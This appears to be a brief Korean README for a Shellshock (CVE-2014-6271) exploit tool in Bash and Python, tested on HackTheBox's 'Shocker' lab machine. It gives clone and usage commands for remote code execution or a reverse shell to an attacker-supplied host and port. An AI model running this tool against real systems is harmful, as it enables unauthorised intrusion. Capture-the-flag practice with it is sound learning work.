
[Python/Shell] - HackTheBox에서 테스트됨 - Shocker (Easy) CVE-2014-6271
sudo git clone https://github.com/Gurguii/shellshock.sh
bash shellshock.sh -u <url> -h* <lhost> -p* <lport>
python3 shellshock.py -u <url> -lh* <lhost> -lp* <lport>
참고: 기본 LPORT는 4444이며, URL은 필수입니다. URL만 제공되면 RCE를 수행하고, 그렇지 않으면 제공된 lhost 및 lport로 RSHELL을 수행합니다.